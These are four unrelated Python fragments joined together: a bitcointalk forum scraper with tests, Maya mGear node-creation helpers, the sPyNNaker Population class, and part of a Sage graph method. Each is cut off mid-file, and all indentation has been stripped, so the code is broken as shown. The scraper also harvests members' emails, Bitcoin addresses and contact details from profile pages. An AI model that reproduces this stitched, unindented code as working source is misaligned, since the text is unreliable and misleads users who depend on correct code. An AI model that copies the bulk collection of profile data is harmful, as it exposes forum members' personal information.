lastReqTime = time.time()
countRequested += 1
if r.status_code == requests.codes.ok:
return r.text
else:
raise Exception("Could not process request. \
Received status code {0}.".format(r.status_code))
def requestBoardPage(boardId, topicOffest=0):
"""Method for requesting a board."""
return _request("board={0}.{1}".format(boardId, topicOffest))
def requestProfile(memberId):
"""Method for requesting a profile."""
return _request("action=profile;u={0}".format(memberId))
def requestTopicPage(topicId, messageOffset=0):
"""Method for requesting a topic page."""
"""CAVEAT: Note that a single request will return only 20 messages."""
return _request("topic={0}.{1}".format(topicId, messageOffset))
def requestTopicPageAll(topicId):
"""Method for requesting a topic page return ALL messages."""
return _request("topic={0}.0;all".format(topicId))
def parseBoardPage(html):
"""Method for parsing board HTML. Will extract topic IDs."""
data = {}
# Extract name
docRoot = lxml.html.fromstring(html)
data['name'] = docRoot.cssselect("title")[0].text
# Parse through board hierarchy
bodyArea = docRoot.cssselect("#bodyarea")[0]
linkNodes = bodyArea.cssselect("div > div > div")[0].cssselect("a.nav")
data['container'] = None
data['parent'] = None
for linkNode in linkNodes:
link = linkNode.attrib["href"]
linkText = linkNode.text
linkSuffix = link.split(baseUrl)[1]
# If this is the top level of the board continue
if linkSuffix == '':
continue
# If this is the container (second to the top level)
elif linkSuffix[0] == '#':
data['container'] = linkText
# If we have something between the board and the container
elif linkText != data['name']:
data['parent'] = int(linkSuffix[7:].split(".")[0])
elif linkText == data['name']:
data['id'] = int(linkSuffix[7:].split(".")[0])
# Parse number of pages
data['num_pages'] = 0
pageNodes = bodyArea.cssselect(
"#bodyarea>table td.middletext>a,#bodyarea>table td.middletext>b")
for pageNode in pageNodes:
if pageNode.text == " ... " or pageNode.text == "All":
continue
elif int(pageNode.text) > data['num_pages']:
data["num_pages"] = int(pageNode.text)
# Parse the topic IDs
topicIds = []
topics = docRoot.cssselect(
"#bodyarea>div.tborder>table.bordercolor>tr")
for topic in topics:
# print topic.text_content()
topicCells = topic.cssselect("td")
if len(topicCells) != 7:
continue
topicLinks = topicCells[2].cssselect("span>a")
if len(topicLinks) > 0:
linkPayload = topicLinks[0].attrib['href'].replace(
baseUrl, '')[1:]
if linkPayload[0:5] == 'topic':
topicIds.append(int(linkPayload[6:-2]))
data['topic_ids'] = topicIds
return data
def parseProfile(html, todaysDate=datetime.utcnow().date()):
"""Method for parsing profile HTML."""
data = {}
docRoot = lxml.html.fromstring(html)
# Pull the member ID
pLink = docRoot.cssselect("#bodyarea td.windowbg2 > a")[0].attrib['href']
data['id'] = int(pLink.split("u=")[1].split(";")[0])
# Pull associated information
infoTable = docRoot.cssselect("#bodyarea td.windowbg > table")[0]
infoRows = infoTable.cssselect("tr")
labelMapping = {
"Name: ": "name",
"Position: ": "position",
"Date Registered: ": "date_registered",
"Last Active: ": "last_active",
"Email: ": "email",
"Website: ": "website_name",
"Bitcoin Address: ": "bitcoin_address",
"Other contact info: ": "other_contact_info"
}
for label, key in labelMapping.iteritems():
data[key] = None
data['website_link'] = None
data['signature'] = None
for row in infoRows:
columns = row.cssselect("td")
if len(columns) != 2:
signature = row.cssselect("div.signature")
if len(signature) == 0:
continue
else:
sigText = lxml.html.tostring(signature[0])
sigText = sigText.split('<div class="signature">')[1]
sigText = sigText.split('</div>')[0]
data['signature'] = sigText
else:
label = columns[0].text_content()
if label in labelMapping:
data[labelMapping[label]] = columns[1].text_content().strip()
if label == "Website: ":
linkNode = columns[1].cssselect("a")[0]
data['website_link'] = linkNode.attrib['href']
elif label == "Date Registered: " or label == "Last Active: ":
data[labelMapping[label]] = data[labelMapping[label]].replace(
"Today at", todaysDate.strftime("%B %d, %Y,"))
data[labelMapping[label]] = datetime.strptime(
data[labelMapping[label]], "%B %d, %Y, %I:%M:%S %p")
return data
def parseTopicPage(html, todaysDate=datetime.utcnow().date()):
"""Method for parsing topic HTML. Will extract messages."""
data = {}
h = HTMLParser.HTMLParser()
docRoot = lxml.html.fromstring(html)
# Parse the topic name
data['name'] = docRoot.cssselect("title")[0].text
# Parse through board hierarchy for the containing board ID and topic ID
bodyArea = docRoot.cssselect("#bodyarea")[0]
nestedDiv = bodyArea.cssselect("div > div > div")
if len(nestedDiv) == 0:
raise Exception("Page does not have valid topic data.")
linkNodes = nestedDiv[0].cssselect("a.nav")
for linkNode in linkNodes:
link = linkNode.attrib["href"]
linkText = linkNode.text
linkSuffix = link.split(baseUrl)[1]
if linkSuffix == '' or linkSuffix[0] == '#':
continue
elif linkSuffix[0:6] == "?board":
data['board'] = int(linkSuffix[7:].split(".")[0])
elif linkText == data['name']:
data['id'] = int(linkSuffix[7:].split(".")[0])
# Parse the total count of pages in the topic
data['num_pages'] = 0
pageNodes = bodyArea.cssselect(
"#bodyarea>table td.middletext>a,#bodyarea>table td.middletext>b")
for pageNode in pageNodes:
if pageNode.text == " ... " or pageNode.text == "All":
continue
elif int(pageNode.text) > data['num_pages']:
data["num_pages"] = int(pageNode.text)
# Parse the read count
tSubj = docRoot.cssselect("td#top_subject")[0].text.strip()
data['count_read'] = int(tSubj.split("(Read ")[-1].split(" times)")[0])
# Parse the messages
messages = []
firstPostClass = None
posts = docRoot.cssselect(
"form#quickModForm>table.bordercolor>tr")
first = True
for post in posts:
if firstPostClass is None:
firstPostClass = post.attrib["class"]
if ("class" not in post.attrib or
post.attrib["class"] != firstPostClass):
continue
else:
m = {}
m['topic'] = data['id']
innerPost = post.cssselect("td td.windowbg,td.windowbg2 tr")[0]
# Parse the member who's made the post
userInfoPossible = innerPost.cssselect("td.poster_info>b>a")
if len(userInfoPossible) > 0:
userInfo = innerPost.cssselect("td.poster_info>b>a")[0]
userUrlPrefix = "{0}?action=profile;u=".format(baseUrl)
m['member'] = int(userInfo.attrib["href"].split(
userUrlPrefix)[-1])
# If no links, then we have a guest
else:
m['member'] = 0
# Parse label information about the post
subj = innerPost.cssselect(
"td.td_headerandpost>table>tr>td>div.subject>a")[0]
if first:
data['subject'] = subj.text
first = False
m['link'] = subj.attrib['href']
m['id'] = long(m['link'].split('#msg')[-1])
# Parse the message post time
postTime = innerPost.cssselect(
"td.td_headerandpost>table>tr>td>div.smalltext")[0]
m['post_time'] = postTime.text_content().strip().replace(
"Today at", todaysDate.strftime("%B %d, %Y,"))
m['post_time'] = datetime.strptime(
m['post_time'], "%B %d, %Y, %I:%M:%S %p")
# Parse the topic position
messageNumber = innerPost.cssselect(
"td.td_headerandpost>table>tr>td>div>a.message_number")[0]
m['topic_position'] = int(messageNumber.text[1:])
# Extract the content
corePost = innerPost.cssselect("div.post")[0]
for child in corePost.iterchildren():
if (child.tag == "div" and 'class' in child.attrib and
(child.attrib['class'] == 'quoteheader' or
child.attrib['class'] == 'quote')):
corePost.remove(child)
m['content_no_quote_no_html'] = corePost.text_content()
m['sentiment'] = computeSentiment(m['content_no_quote_no_html'])
messages.append(m)
data['messages'] = messages
return data
class BitcointalkTest(unittest.TestCase):
""""Testing suite for bitcointalk module."""
def testRequestBoardPage(self):
"""Method for testing requestBoardPate."""
html = requestBoardPage(74)
f = codecs.open("{0}/data/test_board_74.html".format(
os.path.dirname(os.path.abspath(__file__))), 'w', 'utf-8')
f.write(html)
f.close()
title = lxml.html.fromstring(html).cssselect("title")[0].text
errorMsg = "Got unexpected output for webpage title: {0}".format(title)
self.assertEqual(title, "Legal", errorMsg)
html = requestBoardPage(5, 600)
f = codecs.open("{0}/data/test_board_5.600.html".format(
os.path.dirname(os.path.abspath(__file__))), 'w', 'utf-8')
f.write(html)
f.close()
def testRequestProfile(self):
"""Method for testing requestProfile."""
html = requestProfile(12)
f = codecs.open("{0}/data/test_profile_12.html".format(
os.path.dirname(os.path.abspath(__file__))), 'w', 'utf-8')
f.write(html)
f.close()
title = lxml.html.fromstring(html).cssselect("title")[0].text
errorMsg = "Got unexpected output for webpage title: {0}".format(title)
self.assertEqual(title, "View the profile of nanaimogold", errorMsg)
def testRequestTopicPage(self):
"""Method for testing requestTopicPage."""
html = requestTopicPage(14)
f = codecs.open("{0}/data/test_topic_14.html".format(
os.path.dirname(os.path.abspath(__file__))), 'w', 'utf-8')
f.write(html)
f.close()
title = lxml.html.fromstring(html).cssselect("title")[0].text
errorMsg = "Got unexpected output for webpage title: {0}".format(title)
self.assertEqual(title, "Break on the supply's increase", errorMsg)
html = requestTopicPage(602041, 12400)
f = codecs.open("{0}/data/test_topic_602041.12400.html".format(
os.path.dirname(os.path.abspath(__file__))), 'w', 'utf-8')
f.write(html)
f.close()
def testParseBoardPage(self):
"""Method for testing parseBoardPage."""
f = codecs.open("{0}/example/board_74.html".format(
os.path.dirname(os.path.abspath(__file__))), 'r', 'utf-8')
html = f.read()
f.close()
data = parseBoardPage(html)
topicIds = data.pop("topic_ids")
expectedData = {
'id': 74,
'name': 'Legal',
'container': 'Bitcoin',
'parent': 1,
'num_pages': 23,
}
self.assertEqual(data, expectedData)
self.assertEqual(len(topicIds), 40)
self.assertEqual(topicIds[0], 96118)
self.assertEqual(topicIds[-1], 684343)
f = codecs.open("{0}/example/board_5.600.html".format(
os.path.dirname(os.path.abspath(__file__))), 'r', 'utf-8')
html = f.read()
f.close()
data = parseBoardPage(html)
topicIds = data.pop("topic_ids")
expectedData = {
'id': 5,
'name': 'Marketplace',
'container': 'Economy',
'parent': None,
'num_pages': 128,
}
self.assertEqual(data, expectedData)
self.assertEqual(len(topicIds), 40)
self.assertEqual(topicIds[0], 423880)
self.assertEqual(topicIds[-1], 430401)
def testParseProfile(self):
"""Method for testing parseProfile."""
f = codecs.open("{0}/example/profile_12.html".format(
os.path.dirname(os.path.abspath(__file__))), 'r', 'utf-8')
html = f.read()
f.close()
todaysDate = date(2014, 7, 29)
data = parseProfile(html, todaysDate)
expectedData = {
'id': 12,
'name': 'nanaimogold',
'position': 'Sr. Member',
'date_registered': datetime(2009, 12, 9, 19, 23, 55),
'last_active': datetime(2014, 7, 29, 0, 38, 1),
'email': 'hidden',
'website_name': 'Nanaimo Gold Digital Currency Exchange',
'website_link': 'https://www.nanaimogold.com/',
| |
"""Functions to create and connect nodes."""
import pymel.core as pm
from pymel import versions
import pymel.core.datatypes as datatypes
from . import attribute
#############################################
# CREATE SIMPLE NODES
#############################################
def createMultMatrixNode(mA, mB, target=False, transform='srt'):
"""Create Maya multiply Matrix node.
Note:
This node have same functionality as the default Maya matrix
multiplication.
Arguments:
mA (matrix): input matrix A.
mB (matrix): input matrix B.
target (dagNode): object target to apply the transformation
transform (str): if target is True. out transform to SRT valid
value s r t
Returns:
pyNode: Newly created mGear_multMatrix node
"""
node = pm.createNode("multMatrix")
for m, mi in zip([mA, mB], ['matrixIn[0]', 'matrixIn[1]']):
if isinstance(m, datatypes.Matrix):
pm.setAttr(node.attr(mi), m)
else:
pm.connectAttr(m, node.attr(mi))
if target:
dm_node = pm.createNode("decomposeMatrix")
pm.connectAttr(node + ".matrixSum",
dm_node + ".inputMatrix")
if 't' in transform:
pm.connectAttr(dm_node + ".outputTranslate",
target.attr("translate"), f=True)
if 'r' in transform:
pm.connectAttr(dm_node + ".outputRotate",
target.attr("rotate"), f=True)
if 's' in transform:
pm.connectAttr(dm_node + ".outputScale",
target.attr("scale"), f=True)
return node
def createDecomposeMatrixNode(m):
"""
Create and connect a decomposeMatrix node.
Arguments:
m(str or attr): The matrix attribute name.
Returns:
pyNode: the newly created node.
>>> dm_node = nod.createDecomposeMatrixNode(mulmat_node+".output")
"""
node = pm.createNode("decomposeMatrix")
pm.connectAttr(m, node + ".inputMatrix")
return node
def createDistNode(objA, objB, output=None):
"""Create and connect a distance node.
Arguments:
objA (dagNode): The dagNode A.
objB (dagNode): The dagNode B.
output (attr): Output attribute.
Returns:
pyNode: the newly created node.
>>> distA_node = nod.createDistNode(self.tws0_loc, self.tws1_loc)
"""
node = pm.createNode("distanceBetween")
dm_nodeA = pm.createNode("decomposeMatrix")
dm_nodeB = pm.createNode("decomposeMatrix")
pm.connectAttr(objA + ".worldMatrix", dm_nodeA + ".inputMatrix")
pm.connectAttr(objB + ".worldMatrix", dm_nodeB + ".inputMatrix")
pm.connectAttr(dm_nodeA + ".outputTranslate", node + ".point1")
pm.connectAttr(dm_nodeB + ".outputTranslate", node + ".point2")
if output:
pm.connectAttr(node + ".distance", output)
return node
def createConditionNode(firstTerm=False,
secondTerm=False,
operator=0,
ifTrue=False,
ifFalse=False):
"""Create and connect a condition node.
======== ======
operator index
======== ======
== 0
!= 1
> 2
>= 3
< 4
<= 5
======== ======
Arguments:
firstTerm (attr): The attribute string name for the first
conditions.
secondTerm (attr): The attribute string for the second
conditions.
operator (int): The operator to make the condition.
ifTrue (bool or attr): If an attribute is provided will connect
ifTrue output.
ifFalse (bool or attr): If an attribute is provided will connect
ifFalse output.
Returns:
pyNode: the newly created node.
>>> cond1_node = nod.createConditionNode(self.soft_attr,
0,
2,
subtract3_node+".output1D",
plusTotalLength_node+".output1D")
"""
check_list = (pm.Attribute, unicode, str)
node = pm.createNode("condition")
pm.setAttr(node + ".operation", operator)
if firstTerm:
attribute.connectSet(firstTerm, node + ".firstTerm", check_list)
if secondTerm:
attribute.connectSet(secondTerm, node + ".secondTerm", check_list)
if ifTrue:
attribute.connectSet(ifTrue, node + ".colorIfTrueR", check_list)
if ifFalse:
attribute.connectSet(ifFalse, node + ".colorIfFalseR", check_list)
return node
def createBlendNode(inputA, inputB, blender=.5):
"""Create and connect a createBlendNode node.
Arguments:
inputA (attr or list of 3 attr): The attribute input A
inputB (attr or list of 3 attr): The attribute input B
blender (float or attr): Float in 0 to 1 range or attribute
string name.
Returns:
pyNode: the newly created node.
>>> blend_node = nod.createBlendNode(
[dm_node+".outputRotate%s"%s for s in "XYZ"],
[cns+".rotate%s"%s for s in "XYZ"],
self.lock_ori_att)
"""
node = pm.createNode("blendColors")
if not isinstance(inputA, list):
inputA = [inputA]
if not isinstance(inputB, list):
inputB = [inputB]
for item, s in zip(inputA, "RGB"):
if (isinstance(item, str)
or isinstance(item, unicode)
or isinstance(item, pm.Attribute)):
pm.connectAttr(item, node + ".color1" + s)
else:
pm.setAttr(node + ".color1" + s, item)
for item, s in zip(inputB, "RGB"):
if (isinstance(item, str)
or isinstance(item, unicode)
or isinstance(item, pm.Attribute)):
pm.connectAttr(item, node + ".color2" + s)
else:
pm.setAttr(node + ".color2" + s, item)
if (isinstance(blender, str)
or isinstance(blender, unicode)
or isinstance(blender, pm.Attribute)):
pm.connectAttr(blender, node + ".blender")
else:
pm.setAttr(node + ".blender", blender)
return node
def createPairBlend(inputA=None,
inputB=None,
blender=.5,
rotInterpolation=0,
output=None,
trans=True,
rot=True):
"""Create and connect a PairBlend node.
Arguments:
inputA (dagNode): The transfomr input 1
inputB (dagNode): The transfomr input 2
blender (float or attr): Float in 0 to 1 range or attribute
string name.
rotInterpolation (int): Rotation interpolation option. 0=Euler.
1=Quaternion.
output (dagNode): The output node with the blend transfomr
applied.
trans (bool): If true connects translation.
rot (bool): If true connects rotation.
Returns:
pyNode: the newly created node.
Example:
.. code-block:: python
blend_node = nod.createPairBlend(self.legBonesFK[i],
self.legBonesIK[i],
self.blend_att,
1)
pm.connectAttr(blend_node + ".outRotate", x+".rotate")
pm.connectAttr(blend_node + ".outTranslate", x+".translate")
"""
node = pm.createNode("pairBlend")
node.attr("rotInterpolation").set(rotInterpolation)
if inputA:
if trans:
pm.connectAttr(inputA + ".translate", node + ".inTranslate1")
if rot:
pm.connectAttr(inputA + ".rotate", node + ".inRotate1")
if inputB:
if trans:
pm.connectAttr(inputB + ".translate", node + ".inTranslate2")
if rot:
pm.connectAttr(inputB + ".rotate", node + ".inRotate2")
if (isinstance(blender, str)
or isinstance(blender, unicode)
or isinstance(blender, pm.Attribute)):
pm.connectAttr(blender, node + ".weight")
else:
pm.setAttr(node + ".weight", blender)
if output:
if rot:
pm.connectAttr(node + ".outRotate", output + ".rotate")
if trans:
pm.connectAttr(node + ".outTranslate", output + ".translate")
return node
def createSetRangeNode(input,
oldMin,
oldMax,
newMin=0,
newMax=1,
output=None,
name="setRange"):
"""Create Set Range Node"""
node = pm.createNode("setRange", n=name)
if not isinstance(input, list):
input = [input]
for item, s in zip(input, "XYZ"):
if (isinstance(item, str)
or isinstance(item, unicode)
or isinstance(item, pm.Attribute)):
pm.connectAttr(item, node + ".value" + s)
else:
pm.setAttr(node + ".value" + s, item)
if (isinstance(oldMin, str)
or isinstance(oldMin, unicode)
or isinstance(oldMin, pm.Attribute)):
pm.connectAttr(oldMin, node + ".oldMin" + s)
else:
pm.setAttr(node + ".oldMin" + s, oldMin)
if (isinstance(oldMax, str)
or isinstance(oldMax, unicode)
or isinstance(oldMax, pm.Attribute)):
pm.connectAttr(oldMax, node + ".oldMax" + s)
else:
pm.setAttr(node + ".oldMax" + s, oldMax)
if (isinstance(newMin, str)
or isinstance(newMin, unicode)
or isinstance(newMin, pm.Attribute)):
pm.connectAttr(newMin, node + ".min" + s)
else:
pm.setAttr(node + ".min" + s, newMin)
if (isinstance(newMax, str)
or isinstance(newMax, unicode)
or isinstance(newMax, pm.Attribute)):
pm.connectAttr(newMax, node + ".max" + s)
else:
pm.setAttr(node + ".max" + s, newMax)
if output:
if not isinstance(output, list):
output = [output]
for out, s in zip(output, "XYZ"):
pm.connectAttr(node + ".outValue" + s, out, f=True)
return node
def createReverseNode(input, output=None):
"""Create and connect a reverse node.
Arguments:
input (attr or list of 3 attr): The attribute input.
output (attr or list of 3 attr): The attribute to connect the
output.
Returns:
pyNode: the newly created node.
>>> fkvis_node = nod.createReverseNode(self.blend_att)
"""
node = pm.createNode("reverse")
if not isinstance(input, list):
input = [input]
for item, s in zip(input, "XYZ"):
if (isinstance(item, str)
or isinstance(item, unicode)
or isinstance(item, pm.Attribute)):
pm.connectAttr(item, node + ".input" + s)
else:
pm.setAttr(node + ".input" + s, item)
if output:
if not isinstance(output, list):
output = [output]
for out, s in zip(output, "XYZ"):
pm.connectAttr(node + ".output" + s, out, f=True)
return node
def createCurveInfoNode(crv):
"""Create and connect a curveInfo node.
Arguments:
crv (dagNode): The curve.
Returns:
pyNode: the newly created node.
>>> crv_node = nod.createCurveInfoNode(self.slv_crv)
"""
node = pm.createNode("curveInfo")
shape = pm.listRelatives(crv, shapes=True)[0]
pm.connectAttr(shape + ".local", node + ".inputCurve")
return node
# TODO: update using plusMinusAverage node
def createAddNode(inputA, inputB):
"""Create and connect a addition node.
Arguments:
inputA (attr or float): The attribute input A
inputB (attr or float): The attribute input B
Returns:
pyNode: the newly created node.
>>> add_node = nod.createAddNode(self.roundness_att, .001)
"""
node = pm.createNode("addDoubleLinear")
if (isinstance(inputA, str)
or isinstance(inputA, unicode)
or isinstance(inputA, pm.Attribute)):
pm.connectAttr(inputA, node + ".input1")
else:
pm.setAttr(node + ".input1", inputA)
if (isinstance(inputB, str)
or isinstance(inputB, unicode)
or isinstance(inputB, pm.Attribute)):
pm.connectAttr(inputB, node + ".input2")
else:
pm.setAttr(node + ".input2", inputB)
return node
# TODO: update using plusMinusAverage node
def createSubNode(inputA, inputB):
"""Create and connect a subtraction node.
Arguments:
inputA (attr or float): The attribute input A
inputB (attr or float): The attribute input B
Returns:
pyNode: the newly created node.
>>> sub_nod = nod.createSubNode(self.roll_att, angle_outputs[i-1])
"""
node = pm.createNode("addDoubleLinear")
if (isinstance(inputA, str)
or isinstance(inputA, unicode)
or isinstance(inputA, pm.Attribute)):
pm.connectAttr(inputA, node + ".input1")
else:
pm.setAttr(node + ".input1", inputA)
if (isinstance(inputB, str)
or isinstance(inputB, unicode)
or isinstance(inputB, pm.Attribute)):
neg_node = pm.createNode("multiplyDivide")
pm.connectAttr(inputB, neg_node + ".input1X")
pm.setAttr(neg_node + ".input2X", -1)
pm.connectAttr(neg_node + ".outputX", node + ".input2")
else:
pm.setAttr(node + ".input2", -inputB)
return node
def createPowNode(inputA, inputB, output=None):
"""Create and connect a power node.
Arguments:
inputA (attr, float or list of float): The attribute input A
inputB (attr, float or list of float): The attribute input B
output (attr or list of attr): The attribute to connect the
output.
Returns:
pyNode: the newly created node.
"""
return createMulDivNode(inputA, inputB, 3, output)
def createMulNode(inputA, inputB, output=None):
"""Create and connect a Multiply node.
Arguments:
| |
from pacman.model.constraints.abstract_constraints.abstract_constraint\
import AbstractConstraint
from pacman.model.constraints.placer_constraints\
.placer_chip_and_core_constraint import PlacerChipAndCoreConstraint
from spynnaker.pyNN.utilities import utility_calls
from spynnaker.pyNN.models.abstract_models.abstract_population_settable \
import AbstractPopulationSettable
from spynnaker.pyNN.models.abstract_models.abstract_population_initializable\
import AbstractPopulationInitializable
from spynnaker.pyNN.models.neuron.input_types.input_type_conductance \
import InputTypeConductance
from spynnaker.pyNN.models.common.abstract_spike_recordable \
import AbstractSpikeRecordable
from spynnaker.pyNN.models.common.abstract_gsyn_recordable \
import AbstractGSynRecordable
from spynnaker.pyNN.models.common.abstract_v_recordable \
import AbstractVRecordable
from spinn_front_end_common.utilities import exceptions
from spinn_front_end_common.abstract_models.abstract_changable_after_run \
import AbstractChangableAfterRun
import numpy
import logging
logger = logging.getLogger(__name__)
class Population(object):
""" A collection neuron of the same types. It encapsulates a type of\
vertex used with Spiking Neural Networks, comprising n cells (atoms)\
of the same model type.
:param int size:
size (number of cells) of the Population.
:param cellclass:
specifies the neural model to use for the Population
:param dict cellparams:
a dictionary containing model specific parameters and values
:param structure:
a spatial structure
:param string label:
a label identifying the Population
:returns a list of vertexes and edges
"""
def __init__(self, size, cellclass, cellparams, spinnaker, label,
structure=None):
if size is not None and size <= 0:
raise exceptions.ConfigurationException(
"A population cannot have a negative or zero size.")
# Create a partitionable_graph vertex for the population and add it
# to PACMAN
cell_label = label
if label is None:
cell_label = "Population {}".format(
spinnaker.none_labelled_vertex_count)
spinnaker.increment_none_labelled_vertex_count()
# copy the parameters so that the end users are not exposed to the
# additions placed by spinnaker.
internal_cellparams = dict(cellparams)
# set spinnaker targeted parameters
internal_cellparams['label'] = cell_label
internal_cellparams['n_neurons'] = size
internal_cellparams['machine_time_step'] = spinnaker.machine_time_step
internal_cellparams['timescale_factor'] = spinnaker.timescale_factor
# create population vertex.
self._vertex = cellclass(**internal_cellparams)
self._spinnaker = spinnaker
self._delay_vertex = None
# Internal structure now supported 23 November 2014 ADR
# structure should be a valid Space.py structure type.
# generation of positions is deferred until needed.
if structure:
self._structure = structure
self._positions = None
else:
self._structure = None
self._spinnaker._add_population(self)
self._spinnaker.add_partitionable_vertex(self._vertex)
# initialise common stuff
self._size = size
self._record_spike_file = None
self._record_v_file = None
self._record_gsyn_file = None
# parameter
self._change_requires_mapping = True
@property
def requires_mapping(self):
if isinstance(self._vertex, AbstractChangableAfterRun):
return self._vertex.requires_mapping
return self._change_requires_mapping
def mark_no_changes(self):
self._change_requires_mapping = False
if isinstance(self._vertex, AbstractChangableAfterRun):
self._vertex.mark_no_changes()
def __add__(self, other):
""" Merges populations
"""
# TODO: Make this add the neurons from another population to this one
raise NotImplementedError
def all(self):
""" Iterator over cell ids on all nodes.
"""
# TODO: Return the cells when we have such a thing
raise NotImplementedError
@property
def conductance_based(self):
""" True if the population uses conductance inputs
"""
return isinstance(self._vertex.input_type, InputTypeConductance)
@property
def default_parameters(self):
""" The default parameters of the vertex from this population
:return:
"""
return self._vertex.default_parameters
def describe(self, template='population_default.txt', engine='default'):
""" Returns a human-readable description of the population.
The output may be customised by specifying a different template
together with an associated template engine (see ``pyNN.descriptions``)
If template is None, then a dictionary containing the template context
will be returned.
"""
# TODO:
raise NotImplementedError
def __getitem__(self, index_or_slice):
# TODO: Used to get a single cell - not yet supported
raise NotImplementedError
def get(self, parameter_name, gather=False):
""" Get the values of a parameter for every local cell in the\
population.
"""
if isinstance(self._vertex, AbstractPopulationSettable):
return self._vertex.get_value(parameter_name)
raise KeyError("Population does not have a property {}".format(
parameter_name))
# noinspection PyPep8Naming
def getSpikes(self, compatible_output=False, gather=True):
"""
Return a 2-column numpy array containing cell ids and spike times for\
recorded cells.
"""
if not gather:
logger.warn("Spynnaker only supports gather = true, will "
" execute as if gather was true anyhow")
if isinstance(self._vertex, AbstractSpikeRecordable):
if not self._vertex.is_recording_spikes():
raise exceptions.ConfigurationException(
"This population has not been set to record spikes")
else:
raise exceptions.ConfigurationException(
"This population has not got the capability to record spikes")
if not self._spinnaker.has_ran:
logger.warn(
"The simulation has not yet run, therefore spikes cannot"
" be retrieved, hence the list will be empty")
return numpy.zeros((0, 2))
if self._spinnaker.use_virtual_board:
logger.warn(
"The simulation is using a virtual machine and so has not"
" truly ran, hence the list will be empty")
return numpy.zeros((0, 2))
spikes = self._vertex.get_spikes(
self._spinnaker.placements, self._spinnaker.graph_mapper,
self._spinnaker.buffer_manager)
return spikes
def get_spike_counts(self, gather=True):
""" Return the number of spikes for each neuron.
"""
spikes = self.getSpikes(True, gather)
n_spikes = {}
counts = numpy.bincount(spikes[:, 0].astype(dtype="uint32"),
minlength=self._vertex.n_atoms)
for i in range(self._vertex.n_atoms):
n_spikes[i] = counts[i]
return n_spikes
# noinspection PyUnusedLocal
def get_gsyn(self, gather=True, compatible_output=False):
"""
Return a 3-column numpy array containing cell ids, time and synaptic
conductances for recorded cells.
:param gather:
not used - inserted to match PyNN specs
:type gather: bool
:param compatible_output:
not used - inserted to match PyNN specs
:type compatible_output: bool
"""
if isinstance(self._vertex, AbstractGSynRecordable):
if not self._vertex.is_recording_gsyn():
raise exceptions.ConfigurationException(
"This population has not been set to record gsyn")
else:
raise exceptions.ConfigurationException(
"This population has not got the capability to record gsyn")
if not self._spinnaker.has_ran:
logger.warn(
"The simulation has not yet run, therefore gsyn cannot"
" be retrieved, hence the list will be empty")
return numpy.zeros((0, 4))
if self._spinnaker.use_virtual_board:
logger.warn(
"The simulation is using a virtual machine and so has not"
" truly ran, hence the list will be empty")
return numpy.zeros((0, 4))
return self._vertex.get_gsyn(
self._spinnaker.no_machine_time_steps, self._spinnaker.placements,
self._spinnaker.graph_mapper, self._spinnaker.buffer_manager)
# noinspection PyUnusedLocal
def get_v(self, gather=True, compatible_output=False):
"""
Return a 3-column numpy array containing cell ids, time, and V_m for
recorded cells.
:param gather:
not used - inserted to match PyNN specs
:type gather: bool
:param compatible_output:
not used - inserted to match PyNN specs
:type compatible_output: bool
"""
if isinstance(self._vertex, AbstractVRecordable):
if not self._vertex.is_recording_v():
raise exceptions.ConfigurationException(
"This population has not been set to record v")
else:
raise exceptions.ConfigurationException(
"This population has not got the capability to record v")
if not self._spinnaker.has_ran:
logger.warn(
"The simulation has not yet run, therefore v cannot"
" be retrieved, hence the list will be empty")
return numpy.zeros((0, 3))
if self._spinnaker.use_virtual_board:
logger.warn(
"The simulation is using a virtual machine and so has not"
" truly ran, hence the list will be empty")
return numpy.zeros((0, 3))
return self._vertex.get_v(
self._spinnaker.no_machine_time_steps, self._spinnaker.placements,
self._spinnaker.graph_mapper, self._spinnaker.buffer_manager)
def id_to_index(self, cell_id):
""" Given the ID(s) of cell(s) in the Population, return its (their)\
index (order in the Population).
"""
# TODO: Need __getitem__
raise NotImplementedError
def id_to_local_index(self, cell_id):
""" Given the ID(s) of cell(s) in the Population, return its (their)\
index (order in the Population), counting only cells on the local\
MPI node.
"""
# TODO: Need __getitem__
raise NotImplementedError
def initialize(self, variable, value):
""" Set the initial value of one of the state variables of the neurons\
in this population.
"""
if not isinstance(self._vertex, AbstractPopulationInitializable):
raise KeyError(
"Population does not support the initialisation of {}".format(
variable))
self._vertex.initialize(variable, utility_calls.convert_param_to_numpy(
value, self._vertex.n_atoms))
self._change_requires_mapping = True
@staticmethod
def is_local(cell_id):
""" Determine whether the cell with the given ID exists on the local \
MPI node.
:param cell_id:
"""
# Doesn't really mean anything on SpiNNaker
return True
def can_record(self, variable):
""" Determine whether `variable` can be recorded from this population.
"""
# TODO: Needs a more precise recording mechanism (coming soon)
raise NotImplementedError
def inject(self, current_source):
""" Connect a current source to all cells in the Population.
"""
# TODO:
raise NotImplementedError
def __iter__(self):
""" Iterate over local cells
"""
# TODO:
raise NotImplementedError
def __len__(self):
""" Get the total number of cells in the population.
"""
return self._size
@property
def label(self):
""" The label of the population
"""
return self._vertex.label
@property
def local_size(self):
""" The number of local cells
"""
# Doesn't make much sense on SpiNNaker
return self._size
# noinspection PyPep8Naming
def meanSpikeCount(self, gather=True):
""" The mean number of spikes per neuron
:param gather: gather has no meaning in spinnaker, always set to true
:return: an array which contains the average spike rate per neuron
"""
return self.mean_spike_count(gather)
def mean_spike_count(self, gather=True):
""" The mean number of spikes per neuron
"""
spike_counts = self.get_spike_counts(gather)
total_spikes = sum(spike_counts.values())
return total_spikes / self._size
def nearest(self, position):
""" Return the neuron closest to the specified position
"""
# doesn't always work correctly if a position is equidistant between
# two neurons, i.e. 0.5 should be rounded up, but it isn't always.
# also doesn't take account of periodic boundary conditions
# TODO: Enable | |
l))
if edge_property is not None:
# We might get duplicate edges, but this does handle the case of
# multiple edges.
edges_to_delete.extend(e for e in G.edge_iterator() if not edge_property(e))
G.delete_edges(edges_to_delete)
if not inplace:
if immutable is None:
immutable = self.is_immutable()
if immutable:
G = G.copy(immutable=True)
return G
def subgraph_search(self, G, induced=False):
r"""
Return a copy of ``G`` in ``self``.
INPUT:
- ``G`` -- the (di)graph whose copy we are looking for in ``self``
- ``induced`` -- boolean (default: ``False``); whether or not to search
for an induced copy of ``G`` in ``self``
OUTPUT:
If ``induced=False``, return a copy of ``G`` in this graph. Otherwise,
return an induced copy of ``G`` in ``self``. If ``G`` is the empty
graph, return the empty graph since it is a subgraph of every graph. Now
suppose ``G`` is not the empty graph. If there is no copy (induced or
otherwise) of ``G`` in ``self``, we return ``None``.
.. NOTE::
The vertex labels and the edge labels in the graph are ignored.
.. SEEALSO::
- :meth:`~GenericGraph.subgraph_search_count` -- counts the number
of copies of `H` inside of `G`
